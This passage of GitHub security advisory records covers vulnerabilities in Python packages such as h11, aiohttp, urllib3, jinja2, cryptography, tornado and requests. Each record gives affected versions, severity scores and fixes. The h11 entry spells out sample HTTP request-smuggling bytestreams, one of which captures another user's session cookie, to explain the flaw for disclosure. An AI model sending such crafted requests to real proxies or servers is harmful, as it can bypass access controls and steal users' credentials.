"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4539"
},
{
"type": "WEB",
"url": "https://github.com/pygments/pygments/issues/3058"
},
{
"type": "WEB",
"url": "https://github.com/pygments/pygments/pull/3064"
},
{
"type": "WEB",
"url": "https://github.com/pygments/pygments/commit/24b8aa76c6cd6d70f39c6dd605cce319c98e2ccc"
},
{
"type": "PACKAGE",
"url": "https://github.com/pygments/pygments"
},
{
"type": "WEB",
"url": "https://github.com/pygments/pygments/releases/tag/2.20.0"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.352327"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.352327"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.774685"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Pygments has Regular Expression Denial of Service (ReDoS) due to Inefficient Regex for GUID Matching"
}
GHSA-79V4-65XG-PQ4G
Vulnerability from github – Published: 2025-02-11 18:06 – Updated: 2025-02-12 18:20pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in cryptography 42.0.0-44.0.0 are vulnerable to a security issue. More details about the vulnerability itself can be found in https://openssl-library.org/news/secadv/20250211.txt.
If you are building cryptography source ("sdist") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "cryptography"
},
"ranges": [
{
"events": [
{
"introduced": "42.0.0"
},
{
"fixed": "44.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-12797"
],
"database_specific": {
"cwe_ids": [
"CWE-1395",
"CWE-392"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-11T18:06:42Z",
"nvd_published_at": "2025-02-11T16:15:38Z",
"severity": "LOW"
},
"details": "pyca/cryptography\u0027s wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in cryptography 42.0.0-44.0.0 are vulnerable to a security issue. More details about the vulnerability itself can be found in https://openssl-library.org/news/secadv/20250211.txt.\n\nIf you are building cryptography source (\"sdist\") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.",
"id": "GHSA-79v4-65xg-pq4g",
"modified": "2025-02-12T18:20:06Z",
"published": "2025-02-11T18:06:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-79v4-65xg-pq4g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12797"
},
{
"type": "WEB",
"url": "https://github.com/openssl/openssl/commit/738d4f9fdeaad57660dcba50a619fafced3fd5e9"
},
{
"type": "WEB",
"url": "https://github.com/openssl/openssl/commit/798779d43494549b611233f92652f0da5328fbe7"
},
{
"type": "WEB",
"url": "https://github.com/openssl/openssl/commit/87ebd203feffcf92ad5889df92f90bb0ee10a699"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyca/cryptography"
},
{
"type": "WEB",
"url": "https://openssl-library.org/news/secadv/20250211.txt"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/02/11/3"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/02/11/4"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Vulnerable OpenSSL included in cryptography wheels"
}
GHSA-GMJ6-6F8F-6699
Vulnerability from github – Published: 2024-12-23 17:54 – Updated: 2025-01-08 16:06A bug in the Jinja compiler allows an attacker that controls both the content and filename of a template to execute arbitrary Python code, regardless of if Jinja's sandbox is used.
To exploit the vulnerability, an attacker needs to control both the filename and the contents of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates where the template author can also choose the template filename.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.4"
},
"package": {
"ecosystem": "PyPI",
"name": "jinja2"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.1.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-56201"
],
"database_specific": {
"cwe_ids": [
"CWE-150"
],
"github_reviewed": true,
"github_reviewed_at": "2024-12-23T17:54:12Z",
"nvd_published_at": "2024-12-23T16:15:07Z",
"severity": "MODERATE"
},
"details": "A bug in the Jinja compiler allows an attacker that controls both the content and filename of a template to execute arbitrary Python code, regardless of if Jinja\u0027s sandbox is used.\n\nTo exploit the vulnerability, an attacker needs to control both the filename and the contents of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates where the template author can also choose the template filename.",
"id": "GHSA-gmj6-6f8f-6699",
"modified": "2025-01-08T16:06:01Z",
"published": "2024-12-23T17:54:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56201"
},
{
"type": "WEB",
"url": "https://github.com/pallets/jinja/issues/1792"
},
{
"type": "WEB",
"url": "https://github.com/pallets/jinja/commit/767b23617628419ae3709ccfb02f9602ae9fe51f"
},
{
"type": "PACKAGE",
"url": "https://github.com/pallets/jinja"
},
{
"type": "WEB",
"url": "https://github.com/pallets/jinja/releases/tag/3.1.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Jinja has a sandbox breakout through malicious filenames"
}
GHSA-H4GH-QQ45-VH27
Vulnerability from github – Published: 2024-09-03 21:59 – Updated: 2024-09-03 21:59pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in cryptography 37.0.0-43.0.0 are vulnerable to a security issue. More details about the vulnerability itself can be found in https://openssl-library.org/news/secadv/20240903.txt.
If you are building cryptography source ("sdist") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "cryptography"
},
"ranges": [
{
"events": [
{
"introduced": "37.0.0"
},
{
"fixed": "43.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1395"
],
"github_reviewed": true,
"github_reviewed_at": "2024-09-03T21:59:48Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "pyca/cryptography\u0027s wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in cryptography 37.0.0-43.0.0 are vulnerable to a security issue. More details about the vulnerability itself can be found in https://openssl-library.org/news/secadv/20240903.txt.\n\nIf you are building cryptography source (\"sdist\") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.\n",
"id": "GHSA-h4gh-qq45-vh27",
"modified": "2024-09-03T21:59:48Z",
"published": "2024-09-03T21:59:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-h4gh-qq45-vh27"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyca/cryptography"
},
{
"type": "WEB",
"url": "https://openssl-library.org/news/secadv/20240903.txt"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "pyca/cryptography has a vulnerable OpenSSL included in cryptography wheels"
}
GHSA-38JV-5279-WG99
Vulnerability from github – Published: 2026-01-07 19:18 – Updated: 2026-01-23 16:05Impact
urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.
urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption.
However, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409).
Affected usages
Applications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting preload_content=False when they do not disable redirects.
Remediation
Upgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when preload_content=False.
If upgrading is not immediately possible, disable redirects by setting redirect=False for requests to untrusted source.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "urllib3"
},
"ranges": [
{
"events": [
{
"introduced": "1.22"
},
{
"fixed": "2.6.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-21441"
],
"database_specific": {
"cwe_ids": [
"CWE-409"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-07T19:18:14Z",
"nvd_published_at": "2026-01-07T22:15:44Z",
"severity": "HIGH"
},
"details": "### Impact\n\nurllib3\u0027s [streaming API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nurllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption.\n\nHowever, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409).\n\n### Affected usages\n\nApplications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects.\n\n\n### Remediation\n\nUpgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when `preload_content=False`.\n\nIf upgrading is not immediately possible, disable [redirects](https://urllib3.readthedocs.io/en/2.6.2/user-guide.html#retrying-requests) by setting `redirect=False` for requests to untrusted source.",
"id": "GHSA-38jv-5279-wg99",
"modified": "2026-01-23T16:05:21Z",
"published": "2026-01-07T19:18:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21441"
},
{
"type": "WEB",
"url": "https://github.com/urllib3/urllib3/commit/8864ac407bba8607950025e0979c4c69bc7abc7b"
},
{
"type": "PACKAGE",
"url": "https://github.com/urllib3/urllib3"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2026/01/msg00017.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Decompression-bomb safeguards bypassed when following HTTP redirects (streaming API)"
}
GHSA-9548-QRRJ-X5PJ
Vulnerability from github – Published: 2025-07-14 19:33 – Updated: 2025-07-15 00:34Summary
The Python parser is vulnerable to a request smuggling vulnerability due to not parsing trailer sections of an HTTP request.
Impact
If a pure Python version of aiohttp is installed (i.e. without the usual C extensions) or AIOHTTP_NO_EXTENSIONS is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections.
Patch: https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.12.14"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-53643"
],
"database_specific": {
"cwe_ids": [
"CWE-444"
],
"github_reviewed": true,
"github_reviewed_at": "2025-07-14T19:33:31Z",
"nvd_published_at": "2025-07-14T21:15:27Z",
"severity": "LOW"
},
"details": "### Summary\nThe Python parser is vulnerable to a request smuggling vulnerability due to not parsing trailer sections of an HTTP request.\n\n### Impact\nIf a pure Python version of aiohttp is installed (i.e. without the usual C extensions) or AIOHTTP_NO_EXTENSIONS is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections.\n\n----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a",
"id": "GHSA-9548-qrrj-x5pj",
"modified": "2025-07-15T00:34:20Z",
"published": "2025-07-14T19:33:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53643"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": " AIOHTTP is vulnerable to HTTP Request/Response Smuggling through incorrect parsing of chunked trailer sections"
}
GHSA-VQFR-H8MV-GHFJ
Vulnerability from github – Published: 2025-04-24 16:07 – Updated: 2025-04-24 21:41Impact
A leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions.
Details
HTTP/1.1 Chunked-Encoding bodies are formatted as a sequence of "chunks", each of which consists of:
- chunk length
\r\nlengthbytes of content\r\n
In versions of h11 up to 0.14.0, h11 instead parsed them as:
- chunk length
\r\nlengthbytes of content- any two bytes
i.e. it did not validate that the trailing \r\n bytes were correct, and if you put 2 bytes of garbage there it would be accepted, instead of correctly rejecting the body as malformed.
By itself this is harmless. However, suppose you have a proxy or reverse-proxy that tries to analyze HTTP requests, and your proxy has a different bug in parsing Chunked-Encoding, acting as if the format is:
- chunk length
\r\nlengthbytes of content- more bytes of content, as many as it takes until you find a
\r\n
For example, pound had this bug -- it can happen if an implementer uses a generic "read until end of line" helper to consumes the trailing \r\n.
In this case, h11 and your proxy may both accept the same stream of bytes, but interpret them differently. For example, consider the following HTTP request(s) (assume all line breaks are \r\n):
GET /one HTTP/1.1
Host: localhost
Transfer-Encoding: chunked
5
AAAAAXX2
45
0
GET /two HTTP/1.1
Host: localhost
Transfer-Encoding: chunked
0
Here h11 will interpret it as two requests, one with body AAAAA45 and one with an empty body, while our hypothetical buggy proxy will interpret it as a single request, with body AAAAXX20\r\n\r\nGET /two .... And any time two HTTP processors both accept the same string of bytes but interpret them differently, you have the conditions for a "request smuggling" attack. For example, if /two is a dangerous endpoint and the job of the reverse proxy is to stop requests from getting there, then an attacker could use a bytestream like the above to circumvent this protection.
Even worse, if our buggy reverse proxy receives two requests from different users:
GET /one HTTP/1.1
Host: localhost
Transfer-Encoding: chunked
5
AAAAAXX999
0
GET /two HTTP/1.1
Host: localhost
Cookie: SESSION_KEY=abcdef...
...it will consider the first request to be complete and valid, and send both on to the h11-based web server over the same socket. The server will then see the two concatenated requests, and interpret them as one request to /one whose body includes /two's session key, potentially allowing one user to steal another's credentials.
Patches
Fixed in h11 0.15.0.
Workarounds
Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue.
Credits
Reported by Jeppe Bonde Weikop on 2025-01-09.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "h11"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.16.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-43859"
],
"database_specific": {
"cwe_ids": [
"CWE-444"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-24T16:07:56Z",
"nvd_published_at": "2025-04-24T19:15:47Z",
"severity": "CRITICAL"
},
"details": "### Impact\n\nA leniency in h11\u0027s parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions.\n\n### Details\n\nHTTP/1.1 Chunked-Encoding bodies are formatted as a sequence of \"chunks\", each of which consists of:\n\n- chunk length\n- `\\r\\n`\n- `length` bytes of content\n- `\\r\\n`\n\nIn versions of h11 up to 0.14.0, h11 instead parsed them as:\n\n- chunk length\n- `\\r\\n`\n- `length` bytes of content\n- any two bytes\n\ni.e. it did not validate that the trailing `\\r\\n` bytes were correct, and if you put 2 bytes of garbage there it would be accepted, instead of correctly rejecting the body as malformed.\n\nBy itself this is harmless. However, suppose you have a proxy or reverse-proxy that tries to analyze HTTP requests, and your proxy has a _different_ bug in parsing Chunked-Encoding, acting as if the format is:\n\n- chunk length\n- `\\r\\n`\n- `length` bytes of content\n- more bytes of content, as many as it takes until you find a `\\r\\n`\n\nFor example, [pound](https://github.com/graygnuorg/pound/pull/43) had this bug -- it can happen if an implementer uses a generic \"read until end of line\" helper to consumes the trailing `\\r\\n`.\n\nIn this case, h11 and your proxy may both accept the same stream of bytes, but interpret them differently. For example, consider the following HTTP request(s) (assume all line breaks are `\\r\\n`):\n\n```\nGET /one HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n5\nAAAAAXX2\n45\n0\n\nGET /two HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n0\n```\n\nHere h11 will interpret it as two requests, one with body `AAAAA45` and one with an empty body, while our hypothetical buggy proxy will interpret it as a single request, with body `AAAAXX20\\r\\n\\r\\nGET /two ...`. And any time two HTTP processors both accept the same string of bytes but interpret them differently, you have the conditions for a \"request smuggling\" attack. For example, if `/two` is a dangerous endpoint and the job of the reverse proxy is to stop requests from getting there, then an attacker could use a bytestream like the above to circumvent this protection.\n\nEven worse, if our buggy reverse proxy receives two requests from different users:\n\n```\nGET /one HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n5\nAAAAAXX999\n0\n```\n\n```\nGET /two HTTP/1.1\nHost: localhost\nCookie: SESSION_KEY=abcdef...\n```\n\n...it will consider the first request to be complete and valid, and send both on to the h11-based web server over the same socket. The server will then see the two concatenated requests, and interpret them as _one_ request to `/one` whose body includes `/two`\u0027s session key, potentially allowing one user to steal another\u0027s credentials.\n\n### Patches\n\nFixed in h11 0.15.0.\n\n### Workarounds\n\nSince exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue.\n\n### Credits\n\nReported by Jeppe Bonde Weikop on 2025-01-09.",
"id": "GHSA-vqfr-h8mv-ghfj",
"modified": "2025-04-24T21:41:36Z",
"published": "2025-04-24T16:07:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/python-hyper/h11/security/advisories/GHSA-vqfr-h8mv-ghfj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43859"
},
{
"type": "WEB",
"url": "https://github.com/python-hyper/h11/commit/114803a29ce50116dc47951c690ad4892b1a36ed"
},
{
"type": "PACKAGE",
"url": "https://github.com/python-hyper/h11"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "h11 accepts some malformed Chunked-Encoding bodies"
}
GHSA-FQWM-6JPJ-5WXC
Vulnerability from github – Published: 2026-04-03 06:31 – Updated: 2026-04-04 06:45In Tornado before 6.5.5, cookie attribute injection could occur because the domain, path, and samesite arguments to .RequestHandler.set_cookie were not checked for crafted characters.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "tornado"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35536"
],
"database_specific": {
"cwe_ids": [
"CWE-159"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-04T06:45:00Z",
"nvd_published_at": "2026-04-03T04:16:53Z",
"severity": "HIGH"
},
"details": "In Tornado before 6.5.5, cookie attribute injection could occur because the domain, path, and samesite arguments to `.RequestHandler.set_cookie` were not checked for crafted characters.",
"id": "GHSA-fqwm-6jpj-5wxc",
"modified": "2026-04-04T06:45:00Z",
"published": "2026-04-03T06:31:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-78cv-mqj4-43f7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35536"
},
{
"type": "PACKAGE",
"url": "https://github.com/tornadoweb/tornado"
},
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/releases/tag/v6.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Tornado has cookie attribute injection via .RequestHandler.set_cookie"
}
GHSA-GC5V-M9X4-R6X2
Vulnerability from github – Published: 2026-03-25 16:56 – Updated: 2026-03-27 22:07Impact
The requests.utils.extract_zipped_paths() utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one.
Affected usages
Standard usage of the Requests library is not affected by this vulnerability. Only applications that call extract_zipped_paths() directly are impacted.
Remediation
Upgrade to at least Requests 2.33.0, where the library now extracts files to a non-deterministic location.
If developers are unable to upgrade, they can set TMPDIR in their environment to a directory with restricted write access.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "requests"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.33.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25645"
],
"database_specific": {
"cwe_ids": [
"CWE-377"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-25T16:56:28Z",
"nvd_published_at": "2026-03-25T17:16:52Z",
"severity": "MODERATE"
},
"details": "### Impact\nThe `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one.\n\n### Affected usages\n**Standard usage of the Requests library is not affected by this vulnerability.** Only applications that call `extract_zipped_paths()` directly are impacted.\n\n### Remediation\nUpgrade to at least Requests 2.33.0, where the library now extracts files to a non-deterministic location.\n\nIf developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.",
"id": "GHSA-gc5v-m9x4-r6x2",
"modified": "2026-03-27T22:07:42Z",
"published": "2026-03-25T16:56:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25645"
},
{
"type": "WEB",
"url": "https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7"
},
{
"type": "PACKAGE",
"url": "https://github.com/psf/requests"
},
{
"type": "WEB",
"url": "https://github.com/psf/requests/releases/tag/v2.33.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Requests has Insecure Temp File Reuse in its extract_zipped_paths() utility function"
}
GHSA-R6PH-V2QM-Q3C2
Vulnerability from github – Published: 2026-02-10 21:27 – Updated: 2026-02-11 14:14Vulnerability Summary
The public_key_from_numbers (or EllipticCurvePublicNumbers.public_key()), EllipticCurvePublicNumbers.public_key(), load_der_public_key() and load_pem_public_key() functions do not verify that the point belongs to the expected prime-order subgroup of the curve.
This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup.
Only SECT curves are impacted by this.
Credit
This vulnerability was discovered by: - XlabAI Team of Tencent Xuanwu Lab - Atuin Automated Vulnerability Discovery Engine
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 46.0.4"
},
"package": {
"ecosystem": "PyPI",
"name": "cryptography"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "46.0.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-26007"
],
"database_specific": {
"cwe_ids": [
"CWE-345"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-10T21:27:06Z",
"nvd_published_at": "2026-02-10T22:17:00Z",
"severity": "HIGH"
},
"details": "## Vulnerability Summary\n\nThe `public_key_from_numbers` (or `EllipticCurvePublicNumbers.public_key()`), `EllipticCurvePublicNumbers.public_key()`, `load_der_public_key()` and `load_pem_public_key()` functions do not verify that the point belongs to the expected prime-order subgroup of the curve.\n\nThis missing validation allows an attacker to provide a public key point `P` from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as `S = [victim_private_key]P` via ECDH, this leaks information about `victim_private_key mod (small_subgroup_order)`. For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup.\n\nOnly SECT curves are impacted by this.\n\n## Credit\n\nThis vulnerability was discovered by:\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine",
"id": "GHSA-r6ph-v2qm-q3c2",
"modified": "2026-02-11T14:14:19Z",
"published": "2026-02-10T21:27:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007"
},
{
"type": "WEB",
"url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyca/cryptography"
},
{
"type": "WEB",
"url": "https://github.com/pyca/cryptography/releases/tag/46.0.5"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/02/10/4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
],
"summary": "cryptography Vulnerable to a Subgroup Attack Due to Missing Subgroup Validation for SECT Curves"
}
GHSA-M5QP-6W8W-W647
Vulnerability from github – Published: 2026-04-01 21:43 – Updated: 2026-04-06 23:12Summary
A response with an excessive number of multipart headers may be allowed to use more memory than intended, potentially allowing a DoS vulnerability.
Impact
Multipart headers were not subject to the same size restrictions in place for normal headers, potentially allowing substantially more data to be loaded into memory than intended. However, other restrictions in place limit the impact of this vulnerability.
Patch: https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.3"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34516"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T21:43:07Z",
"nvd_published_at": "2026-04-01T21:16:59Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nA response with an excessive number of multipart headers may be allowed to use more memory than intended, potentially allowing a DoS vulnerability.\n\n### Impact\n\nMultipart headers were not subject to the same size restrictions in place for normal headers, potentially allowing substantially more data to be loaded into memory than intended. However, other restrictions in place limit the impact of this vulnerability.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f",
"id": "GHSA-m5qp-6w8w-w647",
"modified": "2026-04-06T23:12:04Z",
"published": "2026-04-01T21:43:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-m5qp-6w8w-w647"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34516"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"schema_version": "1.4.0",
